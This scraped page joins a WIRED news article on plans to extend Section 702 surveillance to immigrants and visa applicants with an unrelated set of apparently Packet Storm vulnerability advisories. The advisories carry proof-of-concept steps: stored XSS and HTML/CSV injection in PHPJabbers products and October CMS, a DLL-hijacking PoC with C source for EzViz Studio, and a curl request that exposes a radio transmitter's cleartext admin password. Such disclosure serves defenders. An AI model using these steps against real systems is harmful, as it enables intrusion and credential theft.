Legislation set to be introduced in Congress this week would extend Section 702 surveillance of people applying for green cards, asylum, and some visas—subjecting loved ones to similar intrusions.

Americans with family overseas who hope to visit the United States may soon face an increased risk of being surveilled by their own government.

Support in Congress is growing for intensified vetting procedures at the US border, which would see immigrants and foreign visitors subjected to the same levels of scrutiny as suspected terrorists and spies. A bill introduced last week by members of the Senate Intelligence Committee (SSCI) and forthcoming legislation from its House counterpart both aim to expand the use of a key foreign intelligence program—Section 702—for screening and vetting visitors to the US.

The House bill, which has yet to be introduced, would additionally target asylum seekers and those applying for nonimmigrant visas and green cards, according to a memo released by the House Intelligence Committee (HPSCI) last month.

In an interview with CBS on Sunday, US Representative Mike Turner, Republican from Ohio and HPSCI chair, said he had gained the support of his Democratic counterpart, Jim Himes, in advancing legislation that would include the enhanced vetting procedures.

The 702 program allows the government to force US companies to wiretap the communications of foreigners who are presumed to be overseas—even when they’re communicating with people inside the US. Billions of calls, texts, and emails are intercepted under the program and committed to a searchable database accessible by four US intelligence agencies, including the Central Intelligence Agency (CIA) and Federal Bureau of Investigation (FBI).

A warrant is not required to conduct searches of the database, and its targets need not be suspected threats to the country. While ostensibly for defense, the 702 program selects targets based on whether they’re expected to possess or receive “foreign intelligence information.” In May, the US State Department said the program was “essential to advancing and promoting US interests around the world,” citing its value as a diplomatic tool.

In a declassified report released this year, a presidential oversight board said the calls and messages of Americans intercepted under Section 702 are “highly personal and sensitive,” detailing exchanges between “loved ones, friends, medical providers, academic advisors, lawyers, or religious leaders.” These communications, according to the Privacy and Civil Liberties Oversight Board (PCLOB), a federal civil liberties watchdog, may provide “great insight into an individual’s whereabouts, both in a given moment and in patterns over time.”

Public knowledge of this surveillance, the board concluded, “can have a chilling effect on speech.”

The 702 program is slated to expire on January 1, 2024. Lawmakers in the House and Senate are rushing to find a solution that would enable the program to continue despite growing mistrust from lawmakers and the public following years of unauthorized use. Abuses of 702 data have included the targeting of racial justice protesters, political activists, and immigrants. Other misused searches of the database for information related to a sitting US congressperson, a US senator, and members of a local political party.

US intelligence community leaders say permitting the program to expire would significantly diminish the government’s ability to monitor and disrupt overseas threats, from terrorism and cyberattacks targeting US infrastructure to espionage and the black market sale of nuclear weapons. “Loss of this vital provision, or its reauthorization in a narrowed form, would raise profound risks,” FBI director Christopher Wray said in a statement this fall.

The wealth of data collected under the 702 program is imponderable. US intelligence agencies have repeatedly claimed there are no means by which to calculate how often Americans are wiretapped without violating procedures intended to keep the program constitutional. The PCLOB report published earlier this year says simply that the collection of domestic communications “should not be understood as occurring infrequently.”

Civil rights experts argue that expanding the program to include routine vetting of people entering the United States would almost certainly be an encumbrance on immigration and asylum systems that US politicians readily acknowledge are broken. There are currently more than 2 million cases pending in US immigration courts, with the average case taking more than four years to adjudicate.

“Some noncitizens—including children and families—wait years to have their cases heard. The delays postpone decisions for vulnerable populations who may be eligible for protections, such as asylum. They also prolong the removal from the US of those who do not have valid claims to remain,” the US Government Accountability Office reported in October.

The vetting proposal, now formally endorsed by both intelligence committees in Congress, has ignited a firestorm among immigrants’ rights groups and nonprofits combating racism against Asian American and Pacific Islander (AAPI) communities. The groups say that, due to their international ties, immigrants naturally face an increased risk of having their communications swept up by the 702 program.

Kia Hamadanchy, senior policy counsel at the American Civil Liberties Union (ACLU), says the Section 702 program “invariably” intercepts communications between foreigners and their American family members. Using the program for vetting purposes means committing to “entirely suspicionless searches” of both, he says.

Andy Wong, a director of advocacy at Stop AAPI Hate, a coalition of community-based groups, has called out Democrats specifically for supporting the move, labeling it a “betrayal” of the Latino and Asian American communities. “We need leaders who dismantle systemic racism,” Wong says, “not entrench policies that leave us more exposed, separated, and vulnerable.”

“The government should be seeking to streamline the immigration process, including the family-based immigration system, not expand warrantless surveillance for individuals seeking to come to the United States,” says Joanna YangQing Derman, program director at the nonprofit Asian Americans Advancing Justice (AAJC). "Expanding warrantless surveillance to specifically go after immigrant communities would not only be harmful, but it would also be a deeply disappointing continuation of this country’s unfair treatment of Asian Americans and Asian immigrants.”

Representative Turner, the HPSCI chair, said Sunday on _Face the Nation_ that his committee had a bill to extend the 702 program endorsed by, among others, Representative Jim Himes, the committee’s ranking Democrat. Turner accused lawmakers not onboard with his bill of misunderstanding how the program works and its “value and importance” to “national security.”

ACLU’s Hamadanchy tells WIRED that it would be concerning to see Himes and other Democrats endorsing use of the program against immigrant communities. “It would represent a dramatic expansion of the current vetting practices,” he says, “and it would be disappointing if it is something Congressman Himes has signed on to.”

Himes did not immediately respond to a request for comment.

Turner said Sunday that he’d already gained the support of the SSCI chair, Senator Mike Warner (D-Virginia), who introduced his own 702 bill last week. Warner’s bill also includes language that expands the 702 program to “enable the vetting of non-United States persons who are being processed for travel to the United States,” but does not mention visas or green cards.

Elizabeth Goitein, senior director of the Brennan Center for Justice’s liberty & national security program, calls Warner’s proposals unnecessary. “There are already plenty of vetting mechanisms in place to ensure that visitors to this country don’t pose a threat to national security or public safety,” she says.

“People should be able to vacation, work, or study in the United States without opening up their private communications to US government scrutiny,” Goitein adds.

Although the text of his bill is not public, much is already known about Turner’s aims. Last month, the HPSCI released an outline of its proposals describing, among other so-called reforms, an amendment that would allow the government to search the 702 database “for the purpose of screening and vetting immigration and non-immigrant visa applicants.”

According to Goitein, the HPSCI proposal would likely impact millions of people living lawfully in the United States, including those with work permits and student visas. “The notion that immigrants give up their privacy rights when they come to this country is wrong and repugnant,” she says.

Senior congressional sources tell WIRED that the HPSCI bill may surface as early as this week. It will compete against another bipartisan bill introduced in the House Judiciary Committee (HJC), chaired by Representative Jim Jordan (R-Ohio), a prominent critic of domestic surveillance abuse.

The contrast between the two House bills is likely to be drastic, with Jordan having previously endorsed an array of privacy reforms, including those aimed at requiring the FBI to obtain a warrant before accessing Americans’ communications amassed by the 702 program—a limitation that is strictly opposed by the heads of the two intelligence committees.

Neither Warner nor Turner immediately responded to inquiries from WIRED on Monday.

Mystery surrounds which bill Representative Mike Johnson (R-Louisiana), the new House speaker, will inevitably endorse. But the HJC traditionally faces stiff opposition from House leaders when pursuing surveillance reform. Republican and Democratic leaders alike have historically shown deference to the appeals of the intelligence community for sustaining and enhancing its authority.

Johnson, meanwhile, is rumored to have held war room discussions last month about extending the Section 702 program by amending must-pass legislation, such as the National Defense Authorization Act—which, despite being months late already, has yet to materialize.

Johnson has not responded to repeated requests for comment from WIRED regarding his thoughts on the 702 program.

_Updated at 10:45 am ET, December 4, 2023, with comment from Joanna YangQing Derman of AAJC._

US Lawmakers Want to Use a Powerful Spy Tool on Immigrants and Their Families

PHPJabbers Appointment Scheduler version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48840Descriptions:PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting.Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 426Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then Start Attack and check mail.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)

PHPJabbers Appointment Scheduler 3.0 Missing Rate Limiting

PHPJabbers Appointment Scheduler version 3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple Stored XSS# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48839Descriptions:PHPJabbers Appointment Scheduler v3.0 is vulnerable to Multiple StoredCross-Site Scripting. Multiple Stored XSS is a type of securityvulnerability that occurs when an application or website allows anattacker to inject malicious scripts into the content that ispermanently stored on the server. Unlike reflected XSS, where themalicious script is embedded in a URL and executed immediately, storedXSS involves the persistent storage of the malicious script on thetarget server, waiting for unsuspecting users to access thecompromised content.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "name, plugin_sms_api_key,plugin_sms_country_code, calendar_id, title, country name,customer_name".3. Go to System Menu then click SMS Settings.4. Then use any XSS Payload in "SMS API Key", "Default Country Code"input field and Save.5. You will see popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48839)

PHPJabbers Appointment Scheduler 3.0 Cross Site Scripting

PHPJabbers Appointment Scheduler version 3.0 suffers from multiple html injection vulnerabilities.

    # Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple HTML Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48838Descriptions:PHPJabbers Appointment Scheduler v3.0 is vulnerable to Multiple HTMLInjection. HTML injection, also known as HTML code injection orcross-site scripting (XSS), is a web security vulnerability thatallows an attacker to inject malicious code into a web page that isthen viewed by other users. This can lead to various attacks, such asstealing sensitive information, session hijacking, defacement ofwebsites, or delivering malware to users.Steps to Reproduce:1. Login your panel.2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48838)

PHPJabbers Appointment Scheduler 3.0 HTML Injection

EzViz Studio v2.2.0 is vulnerable to DLL hijacking.

PoC:

*DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)*

*Author: EAFZ aka myantti3m*

*CVE: **CVE**-2023-41613.*

*Test Environment:*

OS: Windows 11 Pro 64 bit(10.0,  Build 2261)

EzViz Studio version: 2.2.0

*Technical Description *

*1.  **Technical Description *

EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll  
doesn’t exist in any of the paths of the DLL search order. In particular,  
some paths have writable permissions for normal users as:

·         C:\Users\<Username>\AppData\Local\Programs\Microsoft VS  
Code\bin\TcApi.dll

·         C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

So we can plant “malicious” TcApi.dll inside these directories and wait  
until the application will load it.

*POC*

We created a malicious DLL file (TcApi.dll) and complied it. In our case,  
it opens calc.exe. You can see the code below:

#include <windows.h>

#pragma comment (lib, "user32.lib")

#include "pch.h"

#include <iostream>

#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule,

       DWORD nReason, LPVOID lpReserved) {

       switch (nReason) {

       case DLL_PROCESS_ATTACH:

              system("calc.exe");

              break;

       case DLL_PROCESS_DETACH:

              break;

       case DLL_THREAD_ATTACH:

              break;

       case DLL_THREAD_DETACH:

              break;

       }

       return TRUE;

}

Copy “malicious” TcApi.dll to

C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

If we run the EzVizStudio again, the code from the “malicious” DLL runs

CVE-2023-41613: EzViz Studio 2.2.0 DLL Hijacking ≈ Packet Storm

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has author posting capabilities.

    OctoberCMS v3.4.0 (Author) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to be an author feature could perform a storedXSS attack against any other users visiting the posts by the author. Thiscan lead to execute arbitrary HTML/JS code in a user's browser sessionin context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5804Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5804.php30.10.2023--Stored XSS (EntryRecord[title]):--------------------------------Endpoint: /backend/tailor/entries/blog_authorPayload: EntryRecord%5Btitle%5D ="</title><script>alert(1)</script>"

October CMS 3.4.0 Author Cross Site Scripting

PHPJabbers Car Rental version 3.0 suffers from an html injection vulnerability.

    # Exploit Title: PHPJabbers Car Rental v3.0 - HTML Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48837Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to HTMl Injection. HTMLinjection, also known as HTML code injection or cross-site scripting(XSS), is a web security vulnerability that allows an attacker toinject malicious code into a web page that is then viewed by otherusers. This can lead to various attacks, such as stealing sensitiveinformation, session hijacking, defacement of websites, or deliveringmalware to users.Steps to Reproduce:1. Login your panel.2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48837)

PHPJabbers Car Rental 3.0 HTML Injection

PHPJabbers Car Rental version 3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Car Rental v3.0 - Multiple Stored XSS# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48836Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to Multiple Stored Cross-SiteScripting. Multiple Stored XSS is a type of security vulnerabilitythat occurs when an application or website allows an attacker toinject malicious scripts into the content that is permanently storedon the server. Unlike reflected XSS, where the malicious script isembedded in a URL and executed immediately, stored XSS involves thepersistent storage of the malicious script on the target server,waiting for unsuspecting users to access the compromised content.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "name, plugin_sms_api_key,plugin_sms_country_code, calendar_id, title, country name,customer_name".3. Go to System Menu then click SMS Settings.4. Then use any XSS Payload in "SMS API Key", "Default Country Code"input field and Save.5. You will see popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48836)

PHPJabbers Car Rental 3.0 Cross Site Scripting

PHPJabbers Car Rental version 3.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Car Rental v3.0 - CSV Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, MS Office 2010# CVE-2023-48835Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to CSV injectionvulnerability which allows an attacker to execute remote code. Thevulnerability exists due to insufficient input validation on theUnique ID field in the Reservations list that is used to construct aCSV file.Steps to Reproduce:1. Login your panel.2. Go to Options Menu then click Language then click Labels section.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48835)

PHPJabbers Car Rental 3.0 CSV Injection

R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access.

    R Radio Network FM Transmitter 1.07 system.cgi Password DisclosureVendor: R Radio NetworkProduct web page: http://www.pktc.ac.thAffected version: 1.07Summary: R Radio FM Transmitter that includes FM Exciter andFM Amplifier parameter setup.Desc: The transmitter suffers from an improper access controlthat allows an unauthenticated actor to directly reference thesystem.cgi endpoint and disclose the clear-text password of theadmin user allowing authentication bypass and FM station setupaccess.Tested on: CSBtechDeviceVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5802Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php09.10.2023--$ curl -s http://192.168.70.12/system.cgi<html><head><title>System Settings</title>......Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>......$

Tag

#auth